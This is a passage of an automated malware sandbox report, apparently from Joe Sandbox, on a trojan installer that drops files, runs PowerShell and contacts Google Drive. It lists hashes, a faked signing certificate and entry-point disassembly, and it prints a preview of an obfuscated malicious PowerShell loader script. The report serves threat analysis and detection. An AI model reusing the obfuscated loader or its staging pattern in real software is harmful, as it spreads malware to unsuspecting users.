00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive.usercontent.google.com/umsiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          142.250.185.110
                                                                                          		drive.google.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          216.58.206.65
                                                                                          		drive.usercontent.google.comUnited States
                                                                                          		15169GOOGLEUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1587590
                                                                                          Start date and time:2025-01-10 15:15:23 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 51s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:12
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:You7ynHizy.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@6/12@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 33.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 95%
                                                                                          • Number of executed functions: 107
                                                                                          • Number of non-executed functions: 25
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.253.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target msiexec.exe, PID 5692 because there are no executed function
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5036 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          09:16:15API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                          09:16:58API Interceptor34x Sleep call for process: msiexec.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          No context

                                                                                          Domains

                                                                                          No context

                                                                                          ASNs

                                                                                          No context

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e19Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          stage3.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65
                                                                                          1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                          • 142.250.185.110
                                                                                          • 216.58.206.65

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):14744
                                                                                          Entropy (8bit):4.992175361088568
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53ihfors.uo0.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftvo1izi.ark.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fztusdzi.fir.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lp521eal.1oj.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Bevidstgjorde.ren

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):478461
                                                                                          Entropy (8bit):1.2475162534380173
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
                                                                                          MD5:BF4A008DC0B6586BA5DC8205FFC7DF72
                                                                                          SHA1:0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
                                                                                          SHA-256:497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
                                                                                          SHA-512:71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
                                                                                          Malicious:false
                                                                                          Preview:.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:ASCII text, with very long lines (3239), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):54244
                                                                                          Entropy (8bit):5.277142980394084
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:wBN5cfD5CexdtljClWKId45M3ylcZuxZvlKaOT:wW75jjuIWaaxtl3m
                                                                                          MD5:093A76933D4F5ACC7E8710092DB5D62D
                                                                                          SHA1:4CDB7220CF42BAE8F203912558ED514E82BDCAC0
                                                                                          SHA-256:15FC2C43369D3A532643A24D84C3A54B38C47FD2E4570C24FF83E4929100EF25
                                                                                          SHA-512:CB6C33ED85603EA07F0E6BB1C10DB54992D36ED2AE888A56ECE7B06AB7E7FA06A761E1DB43ABE100093AB8A1BC37BC76E09CBBC9650B289B52B5838F15F1A34F
                                                                                          Malicious:true
                                                                                          Preview:$Skismaet215=$Hjords;..<#Ankeinstansers Tsar Elementarpartiklerne Dispergated Pervagation #>..<#Futural Krobylos Overlevelsers Unvictimizeds peafowl Raagummi Nonaccordant #>..<#naturopathic Warships Vagttaarne Interlardment #>..<#Unreproachable Derange Herskerne #>..<#Antispadix Gaveafgift unmaterialized Banjoens Pilei Skocremer #>..<#Srheders Flaskevand Dialektologis #>...$Buddingpulver = @'.gevi.. ndst$Und,rGTils eF mbrnEgalinHu deeWaldomDecapfdivisrBomb eTugthl Sepusdepr eLucenrHalsbnBereneGenl =Dilat$HyperNIndise StoluChastrObsero M.mip ParhtSprnge Sk,draktanoRa ion ulph;prost.ReinifAflnnu ManqnTranscHerbstH ndsiBadiooScoven Brev ExtroASheltfRednifTaloraHammelFrdigd Betvs ForopMetodrMellioJitsudFridauNongecCancheTrinin.nbentPrstaeacousr UndenBil eeBlreh Tro f( Bund$BearbELavtlp.onfieperidiSatirr Omp.o ochigraasye S,mbnSiameyBrand,Skede$Rem nSSalontRulleuOceanmKommip,eoxieH,romrKvitts .kna)Indfo Vandl{ Z.na. Ap e.Livsb$Coa,eSTjurhtKons,aShoppb SkrmeNonstl atofpSlutslServiaMeditdGile

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Husfredens.Mez

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:Matlab v4 mat-file (little endian) \224\224, numeric, rows 12237312, columns 2779054330, imaginary
                                                                                          Category:dropped
                                                                                          Size (bytes):314564
                                                                                          Entropy (8bit):7.694367926160216
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HwvjWWlPYh6QcbC/tZ/Mgk6+HfPwm2VYOiaFfKVqh9YN/lkDpB9n26h01hmW:HwviFQJbkewmYpf7YEpB926hYcW
                                                                                          MD5:26C7AF068C7A28FCEAB7D79EB92DC3E5
                                                                                          SHA1:2CB47B61A7DCA9DE6725AC6F16B09B6D4E31B87B
                                                                                          SHA-256:F0FF2DBCA77C34AA69EED79D68ADD193B0F415B688481B382EA324E0E62F67AD
                                                                                          SHA-512:5B138E09AA7BE673BFF9AA83A8D6F05C8F1C3185003B2F604004C3AD5B3529A73D444DCA2879F2900391DD3BEC9D36A58EFBF85B5FC2580BA690BD145A3281C9
                                                                                          Malicious:false
                                                                                          Preview:..................................[[[[.}}}.g...........66666........((......!..b....Y...............................A.....)..............{................YY............w.W...........RRR.oo......444.R.v.u................NNNN...........&.......JJ.......hhh....NNN...........m............_....................a..............(.xx.....77.......XX.................QQ.................1........UU.................88.l....N..99.........*......c.................)...[............vv....................xx.. .i.....................**.............YY..............6.O.............M...=.k............a.................mmm.]]]............................................................X..KK..............W....G......BB......5.mm.r............:.X......XX.|.......k...~.vvv...........m.......HHHHH....%%.........................YY.)....R..................:.....................uu.......pp.....?..............\\..::...9..I....................K...cc....^..................HHHH..........~~~.....55.......................

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Yellowfin.pre

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):436009
                                                                                          Entropy (8bit):1.2582605930205382
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
                                                                                          MD5:BA41A53F0CE12BDF6DDE858C1BB56E67
                                                                                          SHA1:28CC8982281E9540750800B87B128ACF3E86E1B4
                                                                                          SHA-256:0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
                                                                                          SHA-512:77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
                                                                                          Malicious:false
                                                                                          Preview:.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):672464
                                                                                          Entropy (8bit):7.738289638576833
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:D2QJ9o2sW3B9o2G2/6SkwoFzwjGPi54KeS/8chssEprfUhyWjX53XOn:Dv9o2sW3B9oV2iSkwotwfTx2sKUhyaRu
                                                                                          MD5:98E8E7C349CBB65B53681757DC2959AE
                                                                                          SHA1:8FBB5F9C2A9E524C39AB6269A083353A898D5B57
                                                                                          SHA-256:A2091538AAA8D84E6A73BEE323DAA339C64D4CB13D857A05742445F65FC66013
                                                                                          SHA-512:8A9C030981D8C9D666F46602EC2BF1A84D38F414A60D6E77582CCCD47621113FB574F4C57A1CDD11C2D2F2CE9A7ACB122443645A59D0FFD6F995C4F3A2426AF4
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?......!....@..........................................@=..|...........9...............................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe:Zone.Identifier

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\kakaosmrs.txt

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):356
                                                                                          Entropy (8bit):4.234486179912683
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
                                                                                          MD5:E514D8FDFF4A7AC568F2DED93DADB44E
                                                                                          SHA1:DF81016124C8941F2D9F75B1BCB3D951F911626C
                                                                                          SHA-256:687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
                                                                                          SHA-512:E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
                                                                                          Malicious:false
                                                                                          Preview:udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.738289638576833
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:You7ynHizy.exe
                                                                                          File size:672'464 bytes
                                                                                          MD5:98e8e7c349cbb65b53681757dc2959ae
                                                                                          SHA1:8fbb5f9c2a9e524c39ab6269a083353a898d5b57
                                                                                          SHA256:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013
                                                                                          SHA512:8a9c030981d8c9d666f46602ec2bf1a84d38f414a60d6e77582cccd47621113fb574f4c57a1cdd11c2d2f2ce9a7acb122443645a59d0ffd6f995c4f3a2426af4
                                                                                          SSDEEP:12288:D2QJ9o2sW3B9o2G2/6SkwoFzwjGPi54KeS/8chssEprfUhyWjX53XOn:Dv9o2sW3B9oV2iSkwotwfTx2sKUhyaRu
                                                                                          TLSH:80E40246B150C9AFC6E5B2348566DB58E4B77CB18C32428B73D13B8CEDBDB51684B813
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

                                                                                          File Icon

                                                                                          Icon Hash:397d694151710f3c

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x40336c
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                          Authenticode Signature

                                                                                          Signature Valid:false
                                                                                          Signature Issuer:CN="Overfladearealernes jerreeds Zygnemaceous ", E=Martine@Noodleism.uke, L=Sandwith, S=England, C=GB
                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                          Error Number:-2146762487
                                                                                          Not Before, Not After
                                                                                          • 31/08/2024 05:36:53 31/08/2027 05:36:53
                                                                                          Subject Chain
                                                                                          • CN="Overfladearealernes jerreeds Zygnemaceous ", E=Martine@Noodleism.uke, L=Sandwith, S=England, C=GB
                                                                                          Version:3
                                                                                          Thumbprint MD5:D14B07C67541D7394FE48F79E92EF7EF
                                                                                          Thumbprint SHA-1:2F4C585543297A75AECF936E3B2D1CD7E6C067C5
                                                                                          Thumbprint SHA-256:9736A5F83B15C8BE72675FAB274D3878BE5557A12D72D58C51BF780F5AB544A2
                                                                                          Serial:013669E1CDC12705DCFF40A52EA09744E0A6F368

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          sub esp, 000002D4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          push 00000020h
                                                                                          pop edi
                                                                                          xor ebx, ebx
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+14h], ebx
                                                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                          call dword ptr [004080A8h]
                                                                                          call dword ptr [004080A4h]
                                                                                          and eax, BFFFFFFFh
                                                                                          cmp ax, 00000006h
                                                                                          mov dword ptr [007A8A2Ch], eax
                                                                                          je 00007F8D188B4D23h
                                                                                          push ebx
                                                                                          call 00007F8D188B7FD5h
                                                                                          cmp eax, ebx
                                                                                          je 00007F8D188B4D19h
                                                                                          push 00000C00h
                                                                                          call eax
                                                                                          mov esi, 004082B0h
                                                                                          push esi
                                                                                          call 00007F8D188B7F4Fh
                                                                                          push esi
                                                                                          call dword ptr [00408150h]
                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                          cmp byte ptr [esi], 00000000h
                                                                                          jne 00007F8D188B4CFCh
                                                                                          push 0000000Ah
                                                                                          call 00007F8D188B7FA8h
                                                                                          push 00000008h
                                                                                          call 00007F8D188B7FA1h
                                                                                          push 00000006h
                                                                                          mov dword ptr [007A8A24h], eax
                                                                                          call 00007F8D188B7F95h
                                                                                          cmp eax, ebx
                                                                                          je 00007F8D188B4D21h
                                                                                          push 0000001Eh
                                                                                          call eax
                                                                                          test eax, eax
                                                                                          je 00007F8D188B4D19h
                                                                                          or byte ptr [007A8A2Fh], 00000040h
                                                                                          push ebp
                                                                                          call dword ptr [00408044h]
                                                                                          push ebx
                                                                                          call dword ptr [004082A0h]
                                                                                          mov dword ptr [007A8AF8h], eax
                                                                                          push ebx
                                                                                          lea eax, dword ptr [esp+34h]
                                                                                          push 000002B4h
                                                                                          push eax
                                                                                          push ebx
                                                                                          push 0079FEE0h
                                                                                          call dword ptr [00408188h]
                                                                                          push 0040A2C8h

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d40000x27cc0.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xa39000x9d0.data
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
